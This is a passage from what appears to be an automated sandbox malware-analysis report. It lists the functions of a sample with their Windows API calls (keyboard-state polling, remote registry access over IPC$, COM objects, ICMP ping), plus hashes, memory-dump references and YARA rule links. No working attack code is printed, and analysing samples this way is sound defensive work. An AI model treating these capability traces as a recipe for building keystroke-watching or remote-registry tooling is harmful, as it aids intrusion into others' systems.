                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ColorLongWindow
                                  • String ID:
                                  • API String ID: 259745315-0
                                  • Opcode ID: 7e5b9f0a657306d0a91a0563d1dc857b939bdb367c247628a6351c8407f713e5
                                  • Instruction ID: 1bbff2f559dacd58e73f27c5b47927708e781f509720c7c90ca327cb5b7c4fa4
                                  • Opcode Fuzzy Hash: 7e5b9f0a657306d0a91a0563d1dc857b939bdb367c247628a6351c8407f713e5
                                  • Instruction Fuzzy Hash: AF418E31504650AFDB325F389C88BBA3BADEB47371F15861AF9A28B1E5D7319C42DB10
                                  Function 003B96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0039F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 003B9717
                                  • LoadStringW.USER32(00000000,?,0039F7F8,00000001), ref: 003B9720
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0039F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 003B9742
                                  • LoadStringW.USER32(00000000,?,0039F7F8,00000001), ref: 003B9745
                                  • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 003B9866
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString$Message_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                  • API String ID: 747408836-2268648507
                                  • Opcode ID: c80c0e3462279be164c085378926f9c70fe50412134c387c65f5a80d12c5c49b
                                  • Instruction ID: d86381b1f031294bba11574a0d0188406e463e7570dd36909c5df9638e5b9ff6
                                  • Opcode Fuzzy Hash: c80c0e3462279be164c085378926f9c70fe50412134c387c65f5a80d12c5c49b
                                  • Instruction Fuzzy Hash: 9A415272900119AACF06EBE0CD82EEE7379AF14341F500166FA057B0A2EB356F49CB61
                                  Function 003B06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00356B57: _wcslen.LIBCMT ref: 00356B6A
                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003B07A2
                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003B07BE
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003B07DA
                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 003B0804
                                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 003B082C
                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003B0837
                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003B083C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                  • API String ID: 323675364-22481851
                                  • Opcode ID: d62564c755d6c503debd651c3452691dfef72f661593d52f0fc3fd04fe6bc1d9
                                  • Instruction ID: 2e74bce1287e8631ce3e4091229f728c3a571afa3bf4d5e8496dd83b2760e7a7
                                  • Opcode Fuzzy Hash: d62564c755d6c503debd651c3452691dfef72f661593d52f0fc3fd04fe6bc1d9
                                  • Instruction Fuzzy Hash: 73412971C1022CEBCF26EBA4DC95DEEB778BF04350F154129E905AB1A1EB309E08CB90
                                  Function 003D3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 003D3C5C
                                  • CoInitialize.OLE32(00000000), ref: 003D3C8A
                                  • CoUninitialize.OLE32 ref: 003D3C94
                                  • _wcslen.LIBCMT ref: 003D3D2D
                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 003D3DB1
                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 003D3ED5
                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 003D3F0E
                                  • CoGetObject.OLE32(?,00000000,003EFB98,?), ref: 003D3F2D
                                  • SetErrorMode.KERNEL32(00000000), ref: 003D3F40
                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003D3FC4
                                  • VariantClear.OLEAUT32(?), ref: 003D3FD8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                  • String ID:
                                  • API String ID: 429561992-0
                                  • Opcode ID: bab35d6cb68fc0a68e1dcef6b37912b45468d5c1c0c75a9a90ff0dcaba9fc9a6
                                  • Instruction ID: bd9bfb5d7c19ff11d794a625eb76daf93cd31eedfa52d431ac4c540aa5055544
                                  • Opcode Fuzzy Hash: bab35d6cb68fc0a68e1dcef6b37912b45468d5c1c0c75a9a90ff0dcaba9fc9a6
                                  • Instruction Fuzzy Hash: F6C125726082059FD702DF68D88492BB7E9FF89744F14491EF98A9B361D730EE05CB52
                                  Function 003C7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 003C7AF3
                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003C7B8F
                                  • SHGetDesktopFolder.SHELL32(?), ref: 003C7BA3
                                  • CoCreateInstance.OLE32(003EFD08,00000000,00000001,00416E6C,?), ref: 003C7BEF
                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003C7C74
                                  • CoTaskMemFree.OLE32(?,?), ref: 003C7CCC
                                  • SHBrowseForFolderW.SHELL32(?), ref: 003C7D57
                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003C7D7A
                                  • CoTaskMemFree.OLE32(00000000), ref: 003C7D81
                                  • CoTaskMemFree.OLE32(00000000), ref: 003C7DD6
                                  • CoUninitialize.OLE32 ref: 003C7DDC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                  • String ID:
                                  • API String ID: 2762341140-0
                                  • Opcode ID: 3b1089a79a952f9eb2fb3dd05e9aa3f3154823f97f7eab39a4dcedf1550a4116
                                  • Instruction ID: 4a00ae6f7b83078221355fcf0dafb1cff0e9b3340744f92b2bef1d96e8ccecff
                                  • Opcode Fuzzy Hash: 3b1089a79a952f9eb2fb3dd05e9aa3f3154823f97f7eab39a4dcedf1550a4116
                                  • Instruction Fuzzy Hash: 88C10A75A04109AFCB15DFA4C888EAEBBB9FF48304F158599E81ADB261D730ED45CF90
                                  Function 003E541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003E5504
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E5515
                                  • CharNextW.USER32(00000158), ref: 003E5544
                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003E5585
                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003E559B
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E55AC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$CharNext
                                  • String ID:
                                  • API String ID: 1350042424-0
                                  • Opcode ID: 29bfb32fe97d33da1c8b8d32401b208074d211dd3c9b4ba88d2fa0bab5b62a61
                                  • Instruction ID: d18d61d13dfe2c4f7d525e8a88b5ca0ecc6f193b849136dc1214227213bdc988
                                  • Opcode Fuzzy Hash: 29bfb32fe97d33da1c8b8d32401b208074d211dd3c9b4ba88d2fa0bab5b62a61
                                  • Instruction Fuzzy Hash: 8761B1309046A9EFDF228F52CC849FE7B79EB05329F114245F925AB2D1D7748A81DF60
                                  Function 003AFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003AFAAF
                                  • SafeArrayAllocData.OLEAUT32(?), ref: 003AFB08
                                  • VariantInit.OLEAUT32(?), ref: 003AFB1A
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 003AFB3A
                                  • VariantCopy.OLEAUT32(?,?), ref: 003AFB8D
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 003AFBA1
                                  • VariantClear.OLEAUT32(?), ref: 003AFBB6
                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 003AFBC3
                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003AFBCC
                                  • VariantClear.OLEAUT32(?), ref: 003AFBDE
                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003AFBE9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                  • String ID:
                                  • API String ID: 2706829360-0
                                  • Opcode ID: f42e83dcbdc36b3c6db797cfbd50d614c28e68a60c1e0f6605a4a02b655ffff5
                                  • Instruction ID: 2c7802f2167dd06143fe0f63d598e02c25b6aa8ed87ace103dba74d0b6fbd7f2
                                  • Opcode Fuzzy Hash: f42e83dcbdc36b3c6db797cfbd50d614c28e68a60c1e0f6605a4a02b655ffff5
                                  • Instruction Fuzzy Hash: 71415235A002199FCF16DFA5C894DEDBBB9FF09344F008165F915AB2A1CB30A946CFA0
                                  Function 003B9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 003B9CA1
                                  • GetAsyncKeyState.USER32(000000A0), ref: 003B9D22
                                  • GetKeyState.USER32(000000A0), ref: 003B9D3D
                                  • GetAsyncKeyState.USER32(000000A1), ref: 003B9D57
                                  • GetKeyState.USER32(000000A1), ref: 003B9D6C
                                  • GetAsyncKeyState.USER32(00000011), ref: 003B9D84
                                  • GetKeyState.USER32(00000011), ref: 003B9D96
                                  • GetAsyncKeyState.USER32(00000012), ref: 003B9DAE
                                  • GetKeyState.USER32(00000012), ref: 003B9DC0
                                  • GetAsyncKeyState.USER32(0000005B), ref: 003B9DD8
                                  • GetKeyState.USER32(0000005B), ref: 003B9DEA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: State$Async$Keyboard
                                  • String ID:
                                  • API String ID: 541375521-0
                                  • Opcode ID: 37c6f36c8335396b7cef8ff230454c7caf4e940c4c52e23bd4f383244b2041ed
                                  • Instruction ID: 0cd8cb031133b383bc06bbe364f76f66aa6d5e1c4d49ca89af92388cb4b888b0
                                  • Opcode Fuzzy Hash: 37c6f36c8335396b7cef8ff230454c7caf4e940c4c52e23bd4f383244b2041ed
                                  • Instruction Fuzzy Hash: 6A41D6345047C96DFF33876588443F5BEA06F12348F49805FDBC65A9C2DBA4A9C8CBA2
                                  Function 003D055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAStartup.WSOCK32(00000101,?), ref: 003D05BC
                                  • inet_addr.WSOCK32(?), ref: 003D061C
                                  • gethostbyname.WSOCK32(?), ref: 003D0628
                                  • IcmpCreateFile.IPHLPAPI ref: 003D0636
                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003D06C6
                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003D06E5
                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 003D07B9
                                  • WSACleanup.WSOCK32 ref: 003D07BF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                  • String ID: Ping
                                  • API String ID: 1028309954-2246546115
                                  • Opcode ID: 2f1d059df6ed1c620b9faf86b1aa6743f20705df00b1264bc3f85d97dac3de5a
                                  • Instruction ID: e146a8eec8200bd9bf6acd866bf9ab40df5f83aa6cfee5cda47ae8641a3d9a95
                                  • Opcode Fuzzy Hash: 2f1d059df6ed1c620b9faf86b1aa6743f20705df00b1264bc3f85d97dac3de5a
                                  • Instruction Fuzzy Hash: 6791AE365082419FD326CF15E488F1ABBE4EF44718F0585AAE8698F7A2C730EC45CF81
                                  Function 003D8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen$BuffCharLower
                                  • String ID: cdecl$none$stdcall$winapi
                                  • API String ID: 707087890-567219261
                                  • Opcode ID: 395d6d679df01f2bd794e019399cad058b15ca7654041517703efb4b5ded3657
                                  • Instruction ID: a317b2fa1c5b6cc03afce2b6411c865433b4fe9a5169553ea98bb0735fe63395
                                  • Opcode Fuzzy Hash: 395d6d679df01f2bd794e019399cad058b15ca7654041517703efb4b5ded3657
                                  • Instruction Fuzzy Hash: E651C632A001169BCF16DF6CD8409BEB7A6BF65724B21422AE815EB3C5DB34ED44CB90
                                  Function 003D372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32 ref: 003D3774
                                  • CoUninitialize.OLE32 ref: 003D377F
                                  • CoCreateInstance.OLE32(?,00000000,00000017,003EFB78,?), ref: 003D37D9
                                  • IIDFromString.OLE32(?,?), ref: 003D384C
                                  • VariantInit.OLEAUT32(?), ref: 003D38E4
                                  • VariantClear.OLEAUT32(?), ref: 003D3936
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                  • API String ID: 636576611-1287834457
                                  • Opcode ID: 427de1bcc436ba46f3f5bc7f2b8a2d8b650b229a06ca9071ca101c1ed8d1e535
                                  • Instruction ID: 37b7570305fcf2bb5a5e89ef49b4525c6e03d19519cff56222ce54f7dcefd2b3
                                  • Opcode Fuzzy Hash: 427de1bcc436ba46f3f5bc7f2b8a2d8b650b229a06ca9071ca101c1ed8d1e535
                                  • Instruction Fuzzy Hash: 89618C72608701AFD312DF54E888F6AB7E8AF49714F10490AF9859B391D770EE49CB93
                                  Function 003C3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 003C33CF
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003C33F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: LoadString$_wcslen
                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 4099089115-3080491070
                                  • Opcode ID: 33865af0a1b0b7ddb60b6ded0b057c747e08945872eb45767011b4014572bf02
                                  • Instruction ID: 55ffc4fcc9accb54f3198d953304dd9e8f49f0daff176a1e24e3f75d9cff7a86
                                  • Opcode Fuzzy Hash: 33865af0a1b0b7ddb60b6ded0b057c747e08945872eb45767011b4014572bf02
                                  • Instruction Fuzzy Hash: 61519232900209AADF16EBA0CD42FEEB379AF14341F604166F905770A2EB356F59DB64
                                  Function 003BB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
